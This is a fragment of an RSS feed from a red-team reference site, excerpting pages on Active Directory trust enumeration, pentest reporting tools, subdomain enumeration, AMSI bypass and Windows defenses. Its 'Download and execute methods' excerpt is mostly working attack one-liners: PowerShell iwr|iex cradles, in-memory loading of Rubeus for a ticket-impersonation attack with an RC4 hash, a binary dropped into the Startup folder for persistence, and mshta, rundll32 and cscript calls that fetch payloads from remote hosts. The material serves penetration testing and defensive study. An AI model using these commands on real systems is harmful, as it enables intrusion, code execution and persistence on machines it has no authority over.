&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="no"&gt;System.DirectoryServices.ActiveDirectory.Domain&lt;/span&gt;&lt;span class="p"&gt;]::&lt;/span&gt;&lt;span class="n"&gt;GetCurrentDomain&lt;/span&gt;&lt;span class="p"&gt;()).&lt;/span&gt;&lt;span class="py"&gt;GetAllTrustRelationships&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;SourceName&lt;/span&gt; &lt;span class="n"&gt;TargetName&lt;/span&gt; &lt;span class="n"&gt;TrustType&lt;/span&gt; &lt;span class="n"&gt;TrustDirection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;----------&lt;/span&gt; &lt;span class="p"&gt;----------&lt;/span&gt; &lt;span class="p"&gt;---------&lt;/span&gt; &lt;span class="p"&gt;--------------&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;domainA&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;domainB&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;TreeRoot&lt;/span&gt; &lt;span class="n"&gt;Bidirectional&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;netexec module &lt;code&gt;enum_trusts&lt;/code&gt;&lt;/p&gt;</description></item><item><title>Vulnerability Reports</title><link>https://bokkapig.pages.dev/refs/internal/methodology/vulnerability-reports/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/methodology/vulnerability-reports/</guid><description>&lt;blockquote&gt;
&lt;p&gt;A pentest vulnerability report documents the findings of a penetration test, detailing identified security weaknesses, their potential impact, and remediation steps. It is critical for informing stakeholders about the security posture of their systems, prioritizing vulnerabilities, and guiding mitigation efforts. Effective reports enhance overall security by providing actionable insights to prevent exploitation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Tools to help you collaborate and generate your reports.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/GhostManager/Ghostwriter"&gt;GhostManager/Ghostwriter&lt;/a&gt; - The SpecterOps project management and reporting engine&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/pwndoc/pwndoc"&gt;pwndoc/pwndoc&lt;/a&gt; - Pentest Report Generator&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;List of penetration test reports and templates.&lt;/p&gt;</description></item><item><title>Web Attack Surface</title><link>https://bokkapig.pages.dev/refs/internal/redteam/access/web-attack-surface/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/access/web-attack-surface/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#enumerate-subdomains"&gt;Enumerate Subdomains&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#subdomains-databases"&gt;Subdomains Databases&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bruteforce-subdomains"&gt;Bruteforce Subdomains&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#certificate-transparency-logs"&gt;Certificate Transparency Logs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#dns-resolution"&gt;DNS Resolution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#technology-discovery"&gt;Technology Discovery&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#subdomain-takover"&gt;Subdomain Takeover&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="enumerate-subdomains" class="anchored-heading"&gt;Enumerate Subdomains&lt;a class="heading-anchor" href="#enumerate-subdomains" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Subdomain enumeration is the process of identifying all subdomains associated with a main domain (e.g., finding &lt;code&gt;blog.example.com&lt;/code&gt;, &lt;code&gt;shop.example.com&lt;/code&gt;, etc., for &lt;code&gt;example.com&lt;/code&gt;).&lt;/p&gt;
&lt;h3 id="subdomains-databases" class="anchored-heading"&gt;Subdomains Databases&lt;a class="heading-anchor" href="#subdomains-databases" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;Many databases and tools aggregate data from a variety of online sources, such as DNS databases, certificate transparency logs, APIs (e.g., Shodan, VirusTotal), and other publicly available sources to compile a comprehensive list of potential subdomains.&lt;/p&gt;</description></item><item><title>Windows - AMSI Bypass</title><link>https://bokkapig.pages.dev/refs/internal/redteam/evasion/windows-amsi-bypass/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/evasion/windows-amsi-bypass/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#list-amsi-providers"&gt;List AMSI Providers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#which-endpoint-protection-is-using-amsi"&gt;Which Endpoint Protection is Using AMSI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#patching-amsidll-amsiscanbuffer-by-rasta-mouse"&gt;Patching amsi.dll AmsiScanBuffer by rasta-mouse&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#dont-use-net-webclient"&gt;Dont use net webclient&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#amsi-scanbuffer-patch"&gt;Amsi ScanBuffer Patch from -&amp;gt; https://www.contextis.com/de/blog/amsi-bypass&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#forcing-an-error"&gt;Forcing an error&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#disable-script-logging"&gt;Disable Script Logging&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#amsi-buffer-patch---in-memory"&gt;Amsi Buffer Patch - In memory&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#same-as-6-but-integer-bytes-instead-of-base64"&gt;Same as 6 but integer Bytes instead of Base64&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#using-matt-graebers-reflection-method"&gt;Using Matt Graeber&amp;rsquo;s Reflection method&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#using-matt-graebers-reflection-method-with-wmf5-autologging-bypass"&gt;Using Matt Graeber&amp;rsquo;s Reflection method with WMF5 autologging bypass&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#using-matt-graebers-second-reflection-method"&gt;Using Matt Graeber&amp;rsquo;s second Reflection method&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#using-cornelis-de-plaas-dll-hijack-method"&gt;Using Cornelis de Plaa&amp;rsquo;s DLL hijack method&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#using-powershell-version-2"&gt;Use Powershell Version 2 - No AMSI Support there&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#nishang-all-in-one"&gt;Nishang all in one&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#adam-chester-patch"&gt;Adam Chesters Patch&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#amsifail"&gt;AMSI.fail&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="list-amsi-providers" class="anchored-heading"&gt;List AMSI Providers&lt;a class="heading-anchor" href="#list-amsi-providers" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;List providers with : &lt;code&gt;Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\'&lt;/code&gt;&lt;/p&gt;</description></item><item><title>Windows - Defenses</title><link>https://bokkapig.pages.dev/refs/internal/redteam/evasion/windows-defenses/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/evasion/windows-defenses/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#applocker"&gt;AppLocker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#user-account-control"&gt;User Account Control&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#dpapi"&gt;DPAPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#powershell"&gt;Powershell&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#execution-policy"&gt;Execution Policy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#anti-malware-scan-interface"&gt;Anti Malware Scan Interface&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#just-enough-administration"&gt;Just Enough Administration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#constrained-language-mode"&gt;Contrained Language Mode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#script-block-and-module-logging"&gt;Script Block and Module Logging&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#powershell-transcript"&gt;PowerShell Transcript&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#securestring"&gt;SecureString&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#protected-process-light"&gt;Protected Process Light&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#credential-guard"&gt;Credential Guard&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#event-tracing-for-windows"&gt;Event Tracing for Windows&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#attack-surface-reduction"&gt;Attack Surface Reduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#windows-defender-antivirus"&gt;Windows Defender Antivirus&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#windows-defender-application-control"&gt;Windows Defender Application Control&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#windows-defender-firewall"&gt;Windows Defender Firewall&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#windows-information-protection"&gt;Windows Information Protection&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="applocker" class="anchored-heading"&gt;AppLocker&lt;a class="heading-anchor" href="#applocker" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;AppLocker is a security feature in Microsoft Windows that provides administrators with the ability to control which applications and files users are allowed to run on their systems. The rules can be based on various criteria, such as the file path, file publisher, or file hash, and can be applied to specific users or groups.&lt;/p&gt;</description></item><item><title>Windows - Download and execute methods</title><link>https://bokkapig.pages.dev/refs/internal/redteam/access/windows-download-execute/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/redteam/access/windows-download-execute/</guid><description>&lt;h2 id="downloaded-files-location" class="anchored-heading"&gt;Downloaded files location&lt;a class="heading-anchor" href="#downloaded-files-location" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;C:\Users&amp;amp;lt;username&amp;gt;\AppData\Local\Microsoft\Windows\Temporary Internet Files\&lt;/li&gt;
&lt;li&gt;C:\Users&amp;amp;lt;username&amp;gt;\AppData\Local\Microsoft\Windows\INetCache\IE&amp;amp;lt;subdir&amp;gt;&lt;/li&gt;
&lt;li&gt;C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="powershell" class="anchored-heading"&gt;Powershell&lt;a class="heading-anchor" href="#powershell" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;From an HTTP server&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;powershell&lt;/span&gt; &lt;span class="n"&gt;-exec&lt;/span&gt; &lt;span class="n"&gt;bypass&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr(&amp;#39;http://webserver/payload.ps1&amp;#39;)|iex&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Download only&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Net&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;WebClient&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="py"&gt;DownloadFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;http://10.10.10.10/PowerUp.ps1&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;C:\Windows\Temp\PowerUp.ps1&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Invoke-WebRequest&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;http://10.10.10.10/binary.exe&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-OutFile&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Download and run Rubeus, with arguments&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$data&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Net&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;WebClient&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="py"&gt;DownloadData&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;http://10.10.10.10/Rubeus.exe&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$assem&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="no"&gt;System.Reflection.Assembly&lt;/span&gt;&lt;span class="p"&gt;]::&lt;/span&gt;&lt;span class="n"&gt;Load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="no"&gt;Rubeus.Program&lt;/span&gt;&lt;span class="p"&gt;]::&lt;/span&gt;&lt;span class="n"&gt;Main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Split&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Execute a specific method from an assembly &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$data&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Net&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;WebClient&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="py"&gt;DownloadData&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;http://10.10.10.10/lib.dll&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$assem&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="no"&gt;System.Reflection.Assembly&lt;/span&gt;&lt;span class="p"&gt;]::&lt;/span&gt;&lt;span class="n"&gt;Load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$class&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$assem&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;GetType&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;ClassLibrary1.Class1&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$method&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$class&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;GetMethod&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;runner&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$method&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;Invoke&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mf"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="vm"&gt;$null&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;From a Webdav server&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;powershell&lt;/span&gt; &lt;span class="n"&gt;-exec&lt;/span&gt; &lt;span class="n"&gt;bypass&lt;/span&gt; &lt;span class="o"&gt;-f&lt;/span&gt; &lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;webdavserver&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;folder&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="cmd" class="anchored-heading"&gt;Cmd&lt;a class="heading-anchor" href="#cmd" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;cmd&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt; &lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;webdavserver&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;folder&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;batchfile&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="cscript--wscript" class="anchored-heading"&gt;Cscript / Wscript&lt;a class="heading-anchor" href="#cscript--wscript" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;cscript&lt;/span&gt; &lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;E:jscript&lt;/span&gt; &lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;webdavserver&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;folder&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;txt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="mshta" class="anchored-heading"&gt;Mshta&lt;a class="heading-anchor" href="#mshta" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mshta&lt;/span&gt; &lt;span class="n"&gt;vbscript&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;Close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;GetObject(&amp;#34;&amp;#34;script:http://webserver/payload.sct&amp;#34;&amp;#34;)&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mshta&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;webserver&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;hta&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mshta&lt;/span&gt; &lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;webdavserver&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;folder&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;hta&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="rundll32" class="anchored-heading"&gt;Rundll32&lt;a class="heading-anchor" href="#rundll32" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;rundll32&lt;/span&gt; &lt;span class="p"&gt;\\&lt;/span&gt;&lt;span class="n"&gt;webdavserver&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;folder&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dll&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;entrypoint&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;rundll32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;javascript&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;\..\mshtml,RunHTMLApplication&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="n"&gt;o&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;GetObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;script:http://webserver/payload.sct&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;&lt;span class="n"&gt;window&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;close&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="regasm--regsvc-subtee" class="anchored-heading"&gt;Regasm / Regsvc @subTee&lt;a class="heading-anchor" href="#regasm--regsvc-subtee" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
